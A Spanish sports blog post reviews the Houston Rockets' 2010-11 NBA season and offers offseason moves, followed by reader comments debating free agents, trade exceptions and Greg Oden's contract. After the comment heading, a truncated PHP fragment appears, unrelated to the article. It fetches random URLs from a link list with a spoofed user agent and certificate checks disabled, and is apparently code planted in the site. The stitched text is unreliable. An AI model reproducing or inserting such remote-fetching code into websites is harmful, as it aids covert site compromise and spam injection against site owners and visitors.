Houston Rockets: Aprobado

30 de June de 2011 por txusma

Ya en el análisis de inicio de temporada comentábamos que en un mundo ideal, los Rockets hubieran sido firmes candidatos al anillo. El quinteto Brooks, Kevin Martin, Battier, Scola, Yao sonaba compensado y en el banco aparecían nombres interesantes como Brad Miller, Chase Budinger, Courtney Lee, Kyle Lowry o el rookie Patrick Patterson. A la hora de la verdad, Houston se ha dado de bruces con la cruda realidad. La cruda realidad de que Yao Ming no estaba ni para 25 minutos un día sí y otro no. El chino solo pudo disputar 5 partidos antes de volver a caer lesionado para toda la temporada. De estos 5 partidos, perdieron 4 y es que Houston comenzó el año con una doble personalidad: Una lenta y sosegada con Yao en pista y otra a lo loco con Aaron Brooks comandando la nave. Lo gracioso es que ambos se lesionaron más o menos por las mismas fechas.

La lesión de Brook dejó vía libre a Kyle Lowry que nos dejó a todos con la boca abierta mostrando un gran nivel con triple doble incluído en el mes de marzo. Tan bien lo hizo, que Brooks no pudo recuperar su posición de titular y fue traspasado a los Suns en febrero a cambio de Goran Dragic y una primera ronda después de algunos problemas de disciplina. Ese mismo día, Shane Battier también abandonaba la franquicia a cambio de Hasheem Thabeet en un intento desesperado de la franquicia tejana por proveer de centímetros al equipo. El tanzano sólo ha disputado 2 minutos de juego con los Rockets.

Si tenemos en cuenta la lesión de Yao Ming y la indisciplina de Aaron Brooks, no podemos considerar que la temporada de los Rockets haya sido un fracaso a pesar de no haberse clasificado para los Playoffs. Kevin Martin se ha mantenido sano toda la temporada y ha tenido un rendimiento más que decente, Chuck Hayes rinde por encima de sus teóricas posibilidades (¿el peor jugador de la historia en conseguir un triple doble?), Luis Scola se ha ganado a pulso el buen contrato que firmó la pasada temporada, Budinger y Patterson han demostrado que hay futuro y de Lowry ya hemos hablado. Todos los jugadores, excepto tal vez Scola, creo que han rendido al 105% de sus posibilidades y solamente han dado su brazo a torcer en las últimas jornadas de la liga regular, finalizando con un balance positivo. Como mínimo se merecen el aprobado.

Lo mejor: Kevin Martin ha jugado 80 partidos rompiendo el mal fario de las últimas temporadas. El rendimiento de Kyle Lowry, Chase Budinger y Patrick Patterson. Su lucha por clasificarse hasta el último momento.

Lo peor: Rick Adelman abandona los Rockets. Yao Ming está al borde de la retirada.

Jugando a GM

– Los Rockets se han hecho con Marcus Morris, Donatas Motijuenas y Chandler Parsons en el draft. Ya no vamos a poder cambiar eso pero yo creo que habría optado por Kawhi Leonard antes que por el ex jugador de Kansas. La marcha de Battier dejó la posición de alero algo floja y Leonard hubiese rellenado ese hueco. Una posibilidad es que pongan a Morris a jugar de 3 pero yo lo veo más 4. Teniendo en cuenta que en el equipo ya están Luis Scola, Patrick Patterson, Chuck Hayes y Jordan Hill, ¿de donde sacarán los minutos? Motiejunas parece abocado a jugar de 5.

– También se hicieron con Jonny Flynn a cambio de Brad Miller pero yo no creo que Flynn llegue ni a debutar con la franquicia tejana. Intentarán traspasarlo. Si no lo consiguen tendrán un problema porque no hay minutos para Lowry, Dragic y Flynn.

– La necesidad básica es un 5 de garantías y en el mercado de agentes libres tenemos a Gasol, Dalembert, Nene y Jordan, por ejemplo. Cualquier cosa que evite que Hayes (al que, por cierto, renovaría baratito) tenga que seguir jugando de center será bienvenida. Los Rockets tienen dinero así que pueden ir a por los 2 buenos del grupo: Marc Gasol y Nene Hilario. Solo con este plus creo que el salto ya será importante viendo su final de temporada.

– Las piezas para vender con algún valor se reducen a Thabeet, Terrence Williams (¿qué te pasó chico?), Jordan Hill y Jonny Flynn. de hecho, todos son expirings por los que hay dos vías para venderlos: económica y deportiva. Podemos empaquetar a un par de ellos a cambie de alguien que acabe contrato este mismo año y así disponer de más dinero para convencer a Nene o Gasol.

Comenta

24 comentarios a esta entrada

  1. Cocinitas dice:
    #1

    Yo ficharía a Nené y me traeria tambien a Prince de alero, creo que suena bien un Lowry- Martin- Prince- Scola- Nené. Además hoy se ha sabido que Nené no ejercera su opción de casi 12 millones con Denver y saldrá al mercado. Para completar plantilla intentaria los traspasos de Flynn y Thabeet quizá por un escolta de corte defensivo para suplir a Kevin Martin. A mi me gusta como queda la cosa y más contando con jugadores jovenes como Motiejunas, Morris etc para completar el equipo y crecer ya que contarán con bastantes minutos.

      Citar

  2. Txusma dice:
    #2

    La verdad es que sin grandes movimientos tienen buena pinta. La adición de Nene o Marc les garantiza un C de mucha calidad q hará mucho daño al lado del gran Scola. Y como dices, Prince podría ser la cerecita que completaría el pastel.
    Como escolta defensivo ya tienen a Courtney Lee que cumplió en su papel el año pasado.

      Citar

  3. jas dice:
    #3

    Creo que tienen una trade exception por shane battier no? alguien me lo puede confirmar?

      Citar

  4. CAMPO2 dice:
    #4

    Y Terrence Willams? con lo bien que lo hizo en su temporada rookie y lo que apuntaba el año pasado que iba a ser el sexto hombre de los Nets, y por discutir con Avery Johnson traspasado y con adelman ni bola.

    No lo entiendo, muy mala cabeza debe tener el chaval

      Citar

  5. Txusma dice:
    #5

    Esto de las ‘trade exception’ es todo un misterio. En un primer momento iba a responder que Houston no tenía una TE pq en el traspaso de Battier se igualaron cantidades y ambos equipos estaban por encima del límite. Todo muy normal. Pero si miramos la ESPN Tarde Machine vemos que Houston tiene una Trade exception de 7’3 kilos por el traspaso de Battier.
    Una de las condiciones para obtener una trade exception es que se traspase a un solo jugador. En el caso de Battier no fue así (Battier + Smith x Caroll+Thabeet+1ª ronda) así que como es que tienen una TE? Pues pq resulta que esta clase de traspasos se pueden definir como múltiples de traspasos de manera que se te genere una TE. Vamos, que es muy complicado saber a simple vista si un traspaso genera o no TE.

    Aquí tenéis una lista de las TE que tienen los equipos: http://www.shamsports.com/content/pages/data/salaries/tradeexceptions.jsp

      Citar

  6. Txusma dice:
    #6

    Con esta TE de 7’4 kilos podrías fichar a aleros como Pietrus o Childress, por ejemplo. Han de ser con contrato en vigor, no se puede utilizar para fichar, por ejemplo, a Kirilenko o Prince.

      Citar

  7. Esteban dice:
    #7

    yo le pondia deficiente a su temporada, por el solo hjecho de perder a aron brooks, el año pasado sus casi 20 pp lo hicieron casi una estrella de la liga, y futuro all star, este equipo deberia haberse armado al rededor de el, que baje su rendimiento y lo pierdan via traspaso

    a decir, perdieron a un jugador joven q parecia ser un all star, hoy no tienen all star ni lo tendran, no puede pensar en algo grande enserio un equipo q no tenga una estrella, entrar a play offs para ser barrido, no es gran cosa

      Citar

  8. safd dice:
    #8

    Ultima hora: JJ Hickson a Sacramento a cambio de Casspi y una primera ronda de 2012 protegida (supongo q sera protegida top 10 u 8)

      Citar

  9. safd dice:
    #9

    8 )* :S

      Citar

  10. Txusma dice:
    #10

    Yo creo que Aaron Brooks está lejos de ser considerado una estrella…

      Citar

  11. safd dice:
    #11

    Vamos a ver, Houston ahora mismo con el nivel del oeste, con poco q se muevan bien Denver Clippers, GSW o incluso Utah q si cuajan los rookies y traspasan bien sus interiores pueden hacer un buen papel, es imposible meterse en playoffs.
    Lakers, Spurs (estos alomejor bajan el nivel, pero en una temporada de 50 partidos deberían ser equipo de playoffs sin problema), Dallas, OKC, Portland, Memphis, estos 6 equipos a no ser q la caguen monumentalmente son equipo de playoffs sin problemas.
    LA Clippers este año mejorará mucho su marca, está en una división muy débil y mejoran cada año. Este año a partir de Diciembre consiguieron un 45% de victorias y eso q tuvieron un mes malisimo porq Eric Gordon se perdio 23 PARTIDOS! El año q viene superaran el 50% si las lesiones les respetan.
    Es decir q lucharía por una plaza de PO con Denver q si Faried cuaja como reboteador (dicen q es bueno) y si consiguen retener todos sus buenos FA (Nene parece que no) seguirá siendo un equipo muy competitivo y con GSW, q si mueve bien a Monta Ellis deben ser mejor equipo q Houston.
    Y sobre todo, no creo q consigan luchar playoffs, porq se ha ido el gran ADELMAN. Este tio, teniendo el center más bajo de la NBA, con su estrella que ha jugado 4 partidos, y habiendo regalado a Battier (¿alguien confía en Thabeet? XD) ha luchado por PO hasta el último día!!! Es muy difícil que se pueda suplir bien esta baja…

    Pues eso, yo creo q este equipo no puede luchar más lejos de una 8ª plaza y siendo dificilísimo. Yo intentaría reconstrucción ya, cuanto antes.

    Las grandes piezas que tiene para traspasar son Kevin Martin y Scola, yo a Lowry no lo traspasaba ni de coña.

      Citar

  12. safd dice:
    #12

    PD: Una noticia de NBA en portada de Marca? INCREIBLE! XD Lo del lockout ya se sabía que hoy no se arreglaba…

      Citar

  13. Esteban dice:
    #13

    HICKSON POR CASSPI? ya no entiendo nada, para quien es la ronda de draft? para los cavs imagino…
    hickson es un buen jugador, creo q hubiese sido importante para empaquetarlo con otros jugadores de los cavs, y deshacerse de contratos y conseguir algo mejor q casspi

      Citar

  14. Esteban dice:
    #14

    no decia q brooks sea una estrella, pero luego de la temporada pàsada y sus 19 pp en tres años de carrera, pintaba para ser una, o por lo menos ser un jugadoir con mucho mas valor para incorporar algo mas q el base suplente de phoenix,
    por perder a una potencial estrella, q termino siendo estrellado, y no conseguir nisiuiera un titular por el, digo q esta temporada a sido mala

      Citar

  15. German dice:
    #15

    Consiguiendo a un buen 5 son equipo de playoffs tranquilamente. Yo intentaria traer a Marc, haria una dupla excelente con Scola. De no ser posible, Nene es una buena alternativa tambien. Si Kevin Martin tiene otra temporada como la ultima en cuanto a lesiones, su lugar en playoffs seria un hecho.

      Citar

  16. Txusma dice:
    #16

    Unos cachondos estos de MARCA. Traducen el FAQ de NBA.com y te lo presentan como un artículo suyo…

      Citar

  17. Txusma dice:
    #17

    #safd, Memphis es playoffs tranquilamente si renuevan a Marc y si Zach me demuestra que no es del club del ‘cazo mix’. Lo siento. Sospechoso habitual.
    Siempre se dicen que GSW mejorará y nunca lo hace. Clippers está por ver si da ese salto que tanto se espera, es más complicado de lo que parece. Y Utah, como ya debatimos por aquí está en una difícil situación.
    No sé, si los Rockets se llevan a Marc y hacen algo con la trade exception de Battier yo los veo como 5º o 6º del Oeste por encima de Portland, Spurs (q se quieren vender a Parker y ya se ha desecho de Hill) y Denver si Nene no se queda.

      Citar

  18. TheDeerHunter dice:
    #18

    Por una vez coincido con Esteban. ¡Hickson por Casspi!!! ¿Estamos locos, joder???

      Citar

  19. safd dice:
    #19

    La ronda es para Cavs claro en ese trade.

    Vamos a ver, claro q Houston con un buen 5 es equipo de playoffs y puede que algo más, pero esque buenos 5 se cuentan con los dedos de una mano. Demos un repaso a los centers buenos de la free agency:
    -Marc. Restringido. Memphis le prometio a Zach en su renovación que también se renovaría a Marc después de que este diese como condición para renovar que se renovara a Marc.
    -Chandler. Dallas lo quiere como el comer, aunque este sería el único que podría ir a Houston si ponen eso del hard cap, pero vamos que es prioridad de Dallas y Dallas le ofrecerá 50-60K por 5 años o algo asi
    -Nene. Tiene ofertas de Warriors por lo visto. Pero, ¿creéis que este tío quiere irse a Houston después de irse de Denver? No me cuadra.
    -Dalembert. Este teniendo posibles ofertas de Knicks o Miami chungo lo veo.
    -Oden, Restringido. Valdría la pena pagar más de 9K por este? No se no se.
    -Jordan. Restringido. A este no lo sueltan los clippers ni de coña…
    -Yao.,, que pena de jugador.

    # Txusma mira el dato que puse de Clippers, 45% de victorias a partir de Diciembre que creo que eran 64 partidos y Gordon se perdió en ese tiempo 23. Creo también que en Febrero tuvieron un 2 de 14 por la lesión de gordon, lo normal hubiese sido que hubiesen ganao 5 partidillos mas con Gordon y conseguirían mas del 50% de victorias. Clippers equipo de PO el año que viene si consiguen alejar las lesiones de sus estrellas.
    Y Warriors este año también tuvo mala suerte con las lesiones de Lee y Biedrins. Con estos tendrían mucho mejor record. Además tienen a Monta Ellis para buscar algo en un trade, que seguro que muchos equipos lo quieren. Denver será equipo de playoffs si consiguen sobreponerse de la dura baja de Nene, ya veremos…
    Y recordad una cosa: Rick Adelman ya no es entrenador de los Rockets. Se van a acordar mucho de él…

    Y a los Spurs la gente les da por muertos, no se porq tanta manía de jubilar a Duncan. Si consiguen estos a Nene lucharán por final de conferencia o…

      Citar

  20. Txusma dice:
    #20

    No, si fácil no va a ser. Eso está claro. De la misma manera q nombras las lesiones de Gordon o Lee, hay q recordar que Houston ha jugado con un C de 1’96 todo el año y ha estado a punto de clasificarse para playoffs! Adelman tendrá su parte de culpa pero tb Lowry, Martin, Scola, etc…
    Veo a Marc quedándose en los Grizzlies pero lo de Nene tampoco lo veo tan descabellado. Houston y Denver, sin Nene ninguno de los 2 ,deben estar a la par y creo q por encima de Warriors. Y pq tienen q pagar más de 9 kilos por Oden? A Oden nadie le va a ofrecer más de la MidLevel (ahora digo esto y luego Collangelo le ofrecerá los 9 kilos, ya verás). Dalembert veremos que quiere, si dinero (q Houston puede pagar) o posibilidades de anillo (en ese caso mejor q se vaya a los Heat y no los Knicks)

      Citar

  21. safd dice:
    #21

    Porq era agente restringido y Portland ha ejercido su opción. Cobrará 8,8K el año que viene, si alguien lo quiere tiene que pagar más y que Portland no iguale.

    http://www.hoopsworld.com/TheWireStory.asp?id=31250

    Vamos que no XD

    Lo del center que han estao con el más bajo de la NBA ya lo comenté antes, y sin Adelman la cosa no será igual…
    Por cierto, Denver tiene un espacio salarial impresionante, ahora mismo son los que menos dinero tienen comprometido (28K aunque recibirán ofertas por Afflalo y por Chandler, veremos a ver si los sueltan o no, son agentes libres restringidos). Ojito…
    Vamos, que si Nene se va de Denver no es por dinero, ya lo he dicho, que este equipo le podria dar 12K facil, se va a intentar ganar el anillo, y en Houston no lo va a conseguir.

      Citar

  22. Txusma dice:
    #22

    Pero eso no significa que Oden vaya a cobrar más de 9 kilos el año q viene. Al presentar la Qulyfing Office, los Blazers se aseguran el poder igualar pero si a Oden la máxima oferta que le llega (y acepta) es una Mid Level x 4 años, pues eso es lo q igualarán los Blazers.
    Lo q se asegura Oden es que si no le gusta ninguna oferta de las q le llegan, cobrará el año q viene esos 8,8 kilos y después será agente libre sin restricciones.

      Citar

  23. safd dice:
    #23

    Entonces Oden podría aceptar esa mid level para asegurarse más de 9K no? ¿Entonces si le dan una oferta por 1K 1 año también podría aceptarla no? Mmm, ya entiendo…
    Thanks Txusma

      Citar

  24. Uno cualquiera dice:
    #24

    #safd Creo que no lo has entendido bien.

    Los Blazers, al hacer la QO se aseguran que si llega alguna oferta a Oden (la que sea) la pueden igualar y el jugador sera suyo con esa oferta.

    Es decir, si alguien le ofrece 1 millón, los Blazers pueden igualar la oferta y se quedaría en Portland por 1 millón.

    Pero si nadie hace ninguna oferta, los Blazers se tienen que comer el contrato de 8,8 kilos, así que más les vale que alguien le ofrezca la ML ni que sea.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>